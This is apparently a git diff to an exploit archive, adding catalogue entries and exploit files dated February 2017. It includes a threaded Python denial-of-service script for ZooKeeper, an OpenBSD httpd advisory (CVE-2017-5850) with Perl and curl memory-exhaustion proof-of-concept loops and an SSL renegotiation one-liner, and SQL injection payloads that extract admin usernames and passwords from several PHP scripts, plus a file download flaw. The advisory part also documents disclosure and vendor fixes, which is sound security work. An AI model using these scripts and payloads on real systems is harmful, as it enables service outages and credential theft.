diff --git a/files.csv b/files.csv
index 5eebc448c..f0dc45538 100644
--- a/files.csv
+++ b/files.csv
@@ -5359,6 +5359,8 @@ id,file,description,date,author,platform,type,port
 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
+41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
+41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37185,7 +37187,8 @@ id,file,description,date,author,platform,type,port
 41254,platforms/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41255,platforms/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41256,platforms/php/webapps/41256.txt,"Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
-41257,platforms/php/webapps/41257.txt,"ThisIsWhyImBroke Clone Script 4.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41266,platforms/php/webapps/41266.txt,"Fully Featured News CMS 1.0 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0
+41267,platforms/php/webapps/41267.txt,"MySQL File Uploader 1.0 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0
 41258,platforms/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41259,platforms/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41260,platforms/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
@@ -37193,3 +37196,8 @@ id,file,description,date,author,platform,type,port
 41262,platforms/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41263,platforms/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
 41264,platforms/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' Parameter SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps,0
+41268,platforms/php/webapps/41268.txt,"Easy Support Tools 1.0 - 'stt' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0
+41269,platforms/php/webapps/41269.txt,"Easy Web Search 3 - 'id' Parameter SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps,0
+41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
+41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
+41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
diff --git a/platforms/linux/dos/41277.py b/platforms/linux/dos/41277.py
new file mode 100755
index 000000000..f0e58ed68
--- /dev/null
+++ b/platforms/linux/dos/41277.py
@@ -0,0 +1,86 @@
+#!/usr/bin/python
+
+# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
+# Date: 2/7/2017
+# Exploit Author: Brandon Dennis
+# Email: bdennis@mail.hodges.edu
+# Software Link: http://zookeeper.apache.org/releases.html#download
+# Zookeeper Version: 3.5.2
+# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
+# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. 
+#	This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. 
+#	The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
+#	This should effect Linux x86 & x64 as well
+
+
+
+import time
+import os
+import threading
+import sys
+import socket
+
+numOfThreads = 1
+exitStr = "n"
+stop_threads = False
+threads = []
+ipAddress = "192.168.1.5" #Change this
+port = 2181
+
+def sendCommand(ipAddress, port):
+	try:
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.connect((ipAddress, port))
+		s.send("wchp\r".encode("utf-8"))
+		s.recv(1024)
+		s.send("wchc\r".encode("utf-8"))
+		s.close()
+	except:
+		pass
+
+	
+def runCMD(id, stop, ipAddress, port):
+	while True:
+		sendCommand(ipAddress, port)
+		if stop():
+			break
+	return
+	
+def welcomeBanner():
+	banner = """ _______   __  _____               _               
+|___  | | / / /  __ \             | |              
+   / /| |/ /  | /  \/_ __ __ _ ___| |__   ___ _ __ 
+  / / |    \  | |   | '__/ _` / __| '_ \ / _ | '__|
+./ /__| |\  \ | \__/| | | (_| \__ | | | |  __| |   
+\_____\_| \_/  \____|_|  \__,_|___|_| |_|\___|_|   
+                                                   
+                 By: Brandon Dennis 
+		 Email: bdennis@mail.hodges.edu
+				 """
+	print(banner)
+	
+
+welcomeBanner()
+numOfThreads = int(input("How many threads do you want to use: "))
+print ("Startin Up Threads...")	
+for i in range(numOfThreads):
+	t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
+	threads.append(t)
+	t.start()
+print("Threads are now started...")
+	
+
+while exitStr != "y":
+	inpt = input("Do you wish to stop threads(y): ")
+	
+	if inpt == "y":
+		exitStr = "y"
+
+print("\nStopping Threads...")
+stop_threads = True		
+for thread in threads:
+	thread.join()
+		
+print("Threads are now stopped...")
+sys.exit(0);
+
diff --git a/platforms/openbsd/dos/41278.txt b/platforms/openbsd/dos/41278.txt
new file mode 100755
index 000000000..b06bdeb6a
--- /dev/null
+++ b/platforms/openbsd/dos/41278.txt
@@ -0,0 +1,362 @@
+## Advisory Information
+
+Title: Remote DoS against OpenBSD http server (up to 6.0)
+Advisory URL: https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt
+Blog URL: https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html
+Date published: 2017-02-07
+Vendors contacted: OpenBSD
+Release mode: Released
+CVE: CVE-2017-5850
+
+
+
+## Product Description
+
+The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system.
+
+
+
+## Vulnerabilities Summary
+
+The shipped HTTP daemon in OpenBSD (up to the latest version) is prone to 2 remote DoS.
+
+The first vulnerability allows an attacker to consume all the CPU power from the remote server (CPU exhaustion).
+
+The second vulnerability (Memory exhaustion) allows an attacker to consume all the RAM and the swap space on the remote side.
+Processes will be killed when running out of swap space. The system will be likely to freeze.
+
+
+
+## Details - CPU exhaustion (no CVE entry)
+
+OpenBSD's httpd is prone to a SSL DoS with SSL renegotiation:
+
+user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client -connect 10.0.2.15:443
+CONNECTED(00000003)
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify error:num=18:self signed certificate
+verify return:1
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify return:1
+- ---
+Certificate chain
+ 0 s:/C=XX/ST=secure.example.com/CN=secure.example.com
+   i:/C=XX/ST=secure.example.com/CN=secure.example.com
+- ---
+Server certificate
+- -----BEGIN CERTIFICATE-----
+MIIDCjCCAfICCQC0tQxJqUqQTzANBgkqhkiG9w0BAQsFADBHMQswCQYDVQQGEwJY
+WDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQDDBJzZWN1cmUu
+ZXhhbXBsZS5jb20wHhcNMTcwMTI3MTU0MjMzWhcNMTgwMTI3MTU0MjMzWjBHMQsw
+CQYDVQQGEwJYWDEbMBkGA1UECAwSc2VjdXJlLmV4YW1wbGUuY29tMRswGQYDVQQD
+DBJzZWN1cmUuZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCjIY7mMaNVLmPDA4ir59mgdQEM4TFTgz5cv9SqU4hQq0eVmpJkEfJPHErF
+to5NdF2ZIqhL+F34GqZcCC8qO3xB33dAevENWWbA4KObpIybHr8bFeDYYl5GuaCO
+hizmcffU3P1ztRNXB4sCTTQwkyry8ZUDaeINLGMb0HhFR9u5TJY6tSB0KMIuiBsH
+1hEp8bNxUM046D0wkZkyIgM/or6uj5jRj33aYUn6ZiU8a6UKSAVZJLqziyNcQ0hA
+64gS6oapUnMVYJIUDJynOhY5e8xZmD+2pB4NLTIxAEdSyQ4wQ4jBiRFVL+E68fuw
+kASmrA4gAbSCO+lYBO8wCRiVOwOdAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAC1L
+213ziHqFmC8nLWvvjyoHY2PRFS1ofrfciv+fpohn2GN+eVb8DGTo+KLZ910/PUPk
+dzTa7eOlkvR1OG7BUlnia6pGQqizTodvzx0DGgl76k4VpEvJAOZ4f7Plry4qgr5Y
+y3Fwym1k3DlNJ5Jqh8Vp2HETbqcovATsUHRS5t/oc6N2egq1DYVC5CdGRgvmmUl+
+NBjKOASYoP8S4OQ51wMmXrygFqKcEkq4/GTUFEaamrbM/J+ChD9EqejSKzZ5owRh
+74v10s30OylBdmfOLeyrMv5s6DnJRAdtFEH9Wg7sQDt1P3bGOsObVZlmHCtArl4k
+m1nHRn8scAFP7QbHl34=
+- -----END CERTIFICATE-----
+subject=/C=XX/ST=secure.example.com/CN=secure.example.com
+issuer=/C=XX/ST=secure.example.com/CN=secure.example.com
+- ---
+No client certificate CA names sent
+- ---
+SSL handshake has read 1548 bytes and written 503 bytes
+- ---
+New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384
+Server public key is 2048 bit
+Secure Renegotiation IS supported
+Compression: NONE
+Expansion: NONE
+SSL-Session:
+    Protocol  : TLSv1.2
+    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
+    Session-ID: DA628A16EF4F067ED81E7A26EFA18D9A7D53CBC4ED54C8F6DC11E5E60FF76530
+    Session-ID-ctx: 
+    Master-Key: 9235AFEBCF2A517E896A06CAA7A1AF916646DB5BB4C99B53A79627351C0FFB936EB863B0E50A67DF70A354773CF049BE
+    Key-Arg   : None
+    PSK identity: None
+    PSK identity hint: None
+    SRP username: None
+    TLS session ticket lifetime hint: 300 (seconds)
+    TLS session ticket:
+    0000 - 49 f1 29 da 9e 08 f2 74-c6 f3 eb a1 c7 ee 40 bb   I.)....t......@.
+    0010 - 96 75 54 c8 4f 32 53 7e-51 40 4e a8 e9 57 41 a5   .uT.O2S~Q@N..WA.
+    0020 - 73 3d a9 d6 b8 f7 a0 f8-15 cb be fb f1 4d d9 81   s=...........M..
+    0030 - a8 79 56 11 5d 05 32 05-49 df 2b f3 71 89 36 a1   .yV.].2.I.+.q.6.
+    0040 - 93 dc b9 b5 00 48 6f 94-b1 c5 78 f8 38 3c 63 29   .....Ho...x.8<c)
+    0050 - ed 45 a2 9e ae fc 7e d7-12 76 34 15 93 b1 3d 3d   .E....~..v4...==
+    0060 - d7 0a 14 f1 01 a7 87 6c-50 93 25 24 5e 4f 1b fa   .......lP.%$^O..
+    0070 - 51 03 4b fa 7e 23 83 99-51 f6 47 10 8c d1 0e 41   Q.K.~#..Q.G....A
+    0080 - 5a f7 a5 10 33 a7 37 5d-9b 5e b0 b6 19 e7 e2 61   Z...3.7].^.....a
+    0090 - ec ea 1c 72 3c 4a ec 11-0f 26 35 76 6e d9 cb 4d   ...r<J...&5vn..M
+    00a0 - c7 f8 57 cb 50 f6 47 02-6b ca be cc 29 04 b7 dc   ..W.P.G.k...)...
+    00b0 - e0 d1 cc 8e 5b f9 05 06-10 72 d7 b6 8e cf 42 6a   ....[....r....Bj
+
+    Start Time: 1485536662
+    Timeout   : 300 (sec)
+    Verify return code: 18 (self signed certificate)
+- ---
+RENEGOTIATING
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify error:num=18:self signed certificate
+verify return:1
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify return:1
+RENEGOTIATING
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify error:num=18:self signed certificate
+verify return:1
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify return:1
+RENEGOTIATING
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify error:num=18:self signed certificate
+verify return:1
+depth=0 C = XX, ST = secure.example.com, CN = secure.example.com
+verify return:1
+RENEGOTIATING
+[...]
+
+
+
+- From my test, 1 renegociation thread takes =~ 70% of CPU.
+
+top on the main server (10.0.2.15):
+
+14711 www       51    0 1104K 3636K run       -         1:07 69.55% httpd
+
+Multiple threads will eat all the available CPUs and will be likely to DoS the httpd:
+
+14711 www       63    0 1192K 3708K run       -         2:48 33.45% httpd
+77207 www       63    0 1284K 3788K run       -         1:33 33.06% httpd
+78835 www       62    0 1232K 3808K run       -         0:15 28.08% httpd
+
+There is no trace of such attacks in the httpd logs.
+
+An attacker can use tools from THC to perform SSL DoS too (openssl was the fastest solution out of the box): https://www.thc.org/thc-ssl-dos/.
+
+
+
+## Details - Memory exhaustion (CVE-2017-5850)
+
+A vulnerability exists in the openbsd HTTP daemon. It will result in using all the RAM and the swap space on the remote side, processes will be killed when running out of swap space. The system will be likely to freeze.
+
+Requesting file using a file-range will result in having a httpd process doing a full malloc() of the requested file.
+It appears the entry is not correctly free()'d.
+
+Hence, it's possible to DoS the remote server by requesting a file over and over by specifying a custom file range, ie:
+
+    GET /index.html HTTP/1.1
+    Range: bytes=1-
+    User-Agent: Pierre loves you
+    Host: fill-me-with-joy
+
+This attack is successful if an attacker can identify a 'big' file (i.e. > 10MB) served by the remote HTTP server.
+
+Here is a provided PoC (loosely based on KingCope's apache_killer.pl):
+
+#!/usr/bin/perl -w
+
+use warnings;
+use IO::Socket;
+use Parallel::ForkManager;
+
+$numforks = 50;
+
+if ($#ARGV < 1)
+{
+  &usage;
+  exit;
+}
+
+while (1) {
+  &killhttpd();
+}
+
+sub usage {
+  print "OpenBSD HTTP Remote Denial of Service (memory exhaustion) - @PierreKimSec\n";
+  print "usage: perl killobsdhttpd.pl <host> <remotefile>\n";
+}
+
+sub killhttpd {
+  print "ATTACKING $ARGV[0] [using $numforks forks]\n";
+
+  $pm = new Parallel::ForkManager($numforks);
+
+  for (0 .. $numforks)
+  {
+    my $pid = $pm->start and next;
+    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
+                                     PeerPort => "80",
+                                     Proto    => 'tcp');
+    $p = "GET $ARGV[1] HTTP/1.1\r\nRange: bytes=1-\r\nAccept: */*\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n";
+    print $sock $p;
+    if (<$sock>) {sleep (0.5); $sock->close();}
+    $pm->finish;
+  }
+  $pm->wait_all_children;
+}
+
+
+An attacker can use curl to replicate the PoC:
+
+    curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs
+
+Stopping the curl process and launching it again will produce one of the remote httpd to use more than 10MB of memory
+for each request (the size of the 10mb.fs is 10MB) and will DoS the http server and the OpenBSD system by exhausting
+all the RAM. The OpenBSD system will likely freeze within minutes.
+
+
+PoC with curl (more effective than the perl version, it appears):
+
+#!/bin/sh
+# ./$0 www.target.tld /path/to/file
+
+unset http_proxy
+unset https_proxy
+
+for i in $(seq 0 300)
+do
+  echo sending a req
+  curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null &
+  sleep 0.5
+  pkill curl
+done
+while sleep 1
+do
+  echo "sending a req (slow)"
+  curl --limit-rate 1 --continue-at 1 --header "Host: $1" http://$1/$2 2>/dev/null >/dev/null &
+  pkill curl
+done
+
+This attack works using HTTP and using HTTPS.
+
+Current situation in the attacked server (SWAP is full and all the RAM is being completely used):
+
+load averages:  7.11,  3.30,  1.38                                             foo.my.domain 10:26:41
+39 processes: 6 running, 32 idle, 1 on processor                                             up  0:03
+CPU states:  0.0% user,  0.0% nice,  100% system,  0.0% interrupt,  0.0% idle
+Memory: Real: 569M/961M act/tot Free: 21M Cache: 49M Swap: 2039M/2040M
+
+  PID USERNAME PRI NICE  SIZE   RES STATE     WAIT      TIME    CPU COMMAND
+  48965 www       28    0 1345M  204M run       -         0:05  0.00% httpd
+  43060 www       28    0 1281M  174M run       -         0:05  0.00% httpd
+  91565 www       28    0 1153M  187M run       -         0:04  0.00% httpd
+  63038 www        2    0  948K    4K idle      kqread    0:00  0.00% httpd
+
+
+
+We see the daemons (httpd and sshd) don't answer anymore:
+
+user@kali:~$ 10.0.2.15 80
+Trying 10.0.2.15...
+Connected to 10.0.2.15.
+Escape character is '^]'.
+
+^]
+telnet> q
+Connection closed.
+user@kali:~$ telnet 10.0.2.15 80
+Trying 10.0.2.15...
+Connected to 10.0.2.15.
+Escape character is '^]'.
+
+^]
+telnet> q
+Connection closed.
+user@kali:~$ telnet 10.0.2.15 22
+Trying 10.0.2.15...
+Connected to 10.0.2.15.
+Escape character is '^]'.
+
+^]
+telnet> q
+Connection closed.
+Connection closed by foreign host.
+
+
+
+## Vendor Response
+
+o The issue about memory exhaustion has been solved in two ways:
+- - OpenBSD 6.0/5.9: Erratas has been issued at:
+https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig
+https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig
+
+- - OpenBSD -current: We reimplemented support for byte ranges in
+- -current.  The previous implementation was flawed indeed, as it tried
+to load the complete ranges into memory at once.
+
+
+o High CPU usage is a well-known issue of client-initiated
+renegotiation.  While this can cause higher than normal CPU usage, the
+processes are still able to service requests.
+
+As httpd uses LibreSSL's libtls, a sane TLS API on top of libssl, we
+decided to disable client-initiated renegotiation for libtls servers
+in -current.  This change was already planned and has now been
+committed to LibreSSL.
+
+libssl http://marc.info/?l=openbsd-cvs&m=148587695222112&w=2
+libtls http://marc.info/?l=openbsd-cvs&m=148587827322528&w=2
+
+
+
+## Report Timeline
+
+* Jan 25, 2017: Vulnerabilities found by Pierre Kim.
+* Jan 30, 2017: OpenBSD team is notified of the vulnerabilities.
+* Jan 30, 2017: OpenBSD team replies that they will study the advisory.
+* Jan 31, 2017: OpenBSD team confirms the vulnerabilities.
+* Jan 31, 2017: Pierre Kim asks for CVE entries.
+* Jan 31, 2017: OpenBSD team releases security patches.
+* Feb 01, 2017: cve-assign () mitre org assigns CVE-2017-5850 and asks for more details.
+* Feb 07, 2017: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Pierre Kim (@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/blog/2017-02-07-openbsd-httpd-CVE-2017-5850.html
+https://pierrekim.github.io/advisories/CVE-2017-5850-openbsd.txt
+https://ftp.openbsd.org/pub/OpenBSD/patches/6.0/common/017_httpd.patch.sig
+https://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/034_httpd.patch.sig
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
+
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+
+iQIcBAEBCgAGBQJYmMPLAAoJEMQ+Dtp9ky28SpUP/AvB7lMxjIlmMQi7XJFMgxTX
+0h3WixpI4tunSKyqC9BflMQRyFQgQ5AX8oh0s2OPJbeVc4RsHf2FBMru6NsvIoyR
+Tn537GqqYZ19FpQZOYxEtGVd4SbK+LagtY9xkn4c/Tzd+moDv56e3QKl7AtdLETq
+P/GM+n5I/aN0sSYPDBR8XxYS9HrDPFjPADB3qgM4Jef+TBpTnP/yL2SFwPgGosrq
+05Exo00tK6YXr3zHFAJb/a4Q2L8/nHgZIpLi2iTkISGcOEzWVT3gFeiCdC0cYLHM
+iqCet2eDqEG6UhpP0eQQrFqM30WQ+8z1nDBj4wxX07Np0ZTWkYRw+ezXDYFHIMLE
+uCkVJRRm2zZOTfq8qxTldhE1wyNtd+cEBScT9+7+Xz5NN9Fq3zg47XC8AWQkH7tD
+IAcIF+4aO7NAWT9Y5Q+UR0r9aTXn8fGorj9/I5d7g5fWTUKujQjnscuZQ/4e0+1B
+yb2KAO3Al8s4LQnbqXU/qJ5y/tm+Ra7kxRdogRHpkDR8TwCTwHtTMz+mxGtbIL3X
+C0plD5sde6MlYCnkd8WKEBb0bBYyR3leaew6s0dx7iz+smQWe9wXufvMLjQgkP6/
+6xfRPyQWOxc4KCWiB5kalQ2soOFVeHbHWimG3/+39qNOb8dY7XA1+0wmYKtdDKvR
+3x5MojAce/XvKlx7Cy02
+=MAFw
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/php/webapps/41253.txt b/platforms/php/webapps/41253.txt
index 6ecad79e5..80d4ee239 100755
--- a/platforms/php/webapps/41253.txt
+++ b/platforms/php/webapps/41253.txt
@@ -16,3 +16,8 @@
 # http://localhost/[PATH]/listing.php?id=[SQL]
 -21+/*!50000union*/+select+1,version(),3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,16,17
 # # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/listing.php?id=[SQL]
+# Etc...
+# -9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16+from+admin--
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41257.txt b/platforms/php/webapps/41257.txt
deleted file mode 100755
index 6c6baa6f8..000000000
--- a/platforms/php/webapps/41257.txt
+++ /dev/null
@@ -1,19 +0,0 @@
-# # # # # 
-# Exploit Title: Flippy AffilatePlatform – ThisIsWhyImBroke Clone Script v4.0.0 - SQL Injection
-# Google Dork: N/A
-# Date: 06.02.2017
-# Vendor Homepage: https://www.flippyscripts.com/
-# Software Buy: https://www.flippyscripts.com/flippy-affilateplatform-affilate-site-builder-script/
-# Demo: http://ap.flippydemos.com/
-# Version: 4.0.0
-# Tested on: Win7 x64, Kali Linux x64
-# # # # # 
-# Exploit Author: Ihsan Sencan
-# Author Web: http://ihsan.net
-# Author Mail : ihsan[beygir]ihsan[nokta]net
-# # # # #
-# SQL Injection/Exploit :
-# http://localhost/[PATH]/listing.php?id=[SQL]
-# Etc...
-# -9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16+from+admin--
-# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41266.txt b/platforms/php/webapps/41266.txt
new file mode 100755
index 000000000..585f7fe7a
--- /dev/null
+++ b/platforms/php/webapps/41266.txt
@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: NewsBee - Fully Featured News CMS Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
+# Demo: http://demos.nelliwinne.net/NewsBee/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/video.php?id=[SQL]
+# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -
+# Etc....Other files have vulnerabilities ...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41267.txt b/platforms/php/webapps/41267.txt
new file mode 100755
index 000000000..985f0ffab
--- /dev/null
+++ b/platforms/php/webapps/41267.txt
@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
+# Demo: http://demos.nelliwinne.net/MySqlFileUpload/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/download.php?id=[SQL]&t=files
+# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
+# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
+# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
+# Etc....Other files have vulnerabilities ...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41268.txt b/platforms/php/webapps/41268.txt
new file mode 100755
index 000000000..02bf520e5
--- /dev/null
+++ b/platforms/php/webapps/41268.txt
@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Easy Support Tools - FAQs, Help Articles, Blog and Feedback Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/easy-support-tools-faqs-help-articles-blog-and-feedback/17864522
+# Demo: http://demos.nelliwinne.net/EasyFAQ/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/faq.php?stt=[SQL]
+# 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/support.php?stt=[SQL]
+# 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/blog.php?stt=[SQL]
+# 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# Etc....Other files have vulnerabilities ...
+# # # # #
diff --git a/platforms/php/webapps/41269.txt b/platforms/php/webapps/41269.txt
new file mode 100755
index 000000000..644ee3ba2
--- /dev/null
+++ b/platforms/php/webapps/41269.txt
@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Easy Web Search - PHP Search Engine with Image Search and Crawling System  Script v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
+# Demo: http://demos.nelliwinne.net/EasyWebSearchDev/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/go.php?id=[SQL]
+# 99999'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/all.php?q=&stt=[SQL]
+# 99999+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# Etc....Other files have vulnerabilities ...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41270.txt b/platforms/php/webapps/41270.txt
new file mode 100755
index 000000000..6ad6d8243
--- /dev/null
+++ b/platforms/php/webapps/41270.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: FTP Made Easy PRO Script v1.2 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 07.02.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Buy: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
+# Demo: http://demos.nelliwinne.net/FTPMadeEasyPRO/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# http://localhost/[PATH]/download.php?id=[FILE]
+# # # # #
\ No newline at end of file
